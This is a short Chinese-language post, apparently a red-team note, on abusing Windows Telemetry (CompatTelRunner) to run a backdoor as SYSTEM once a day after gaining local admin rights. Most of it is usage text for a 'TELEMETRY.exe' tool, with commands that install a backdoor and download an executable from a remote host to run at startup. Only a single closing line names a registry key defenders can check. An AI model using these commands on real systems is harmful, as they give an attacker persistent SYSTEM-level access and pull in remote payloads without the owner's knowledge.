文章目录
利用条件
- 本地管理员权限(绕过UAC)
- 有Compatelrunner命令
- 系统版本:2008R2/Windows 7 through 2019/Windows 10
达成效果
每天以system权限执行一次后门文件
利用过程
下载利用脚本到主机上并执行,下列为脚本用法:
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoorCommand: TELEMETRY.exe install /command:calc - Execute command without file backdoor TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe - Remotely download * files to the specified directory for backdoor startup TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe - Remotely download * files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup TELEMETRY.exe install /path:C:\Windows\Temp\check.exe - Set path * files for backdoor startup Parameter: /command: - Execute Command /url: - Download FROM /path: - Download To Execute command without file backdoor
Telemetry.exe install /command:calc
Telemetry.exe install /url:http://vps:8089/System.exe
原理
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
防御手法
检测下面的键值是否合法:
HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController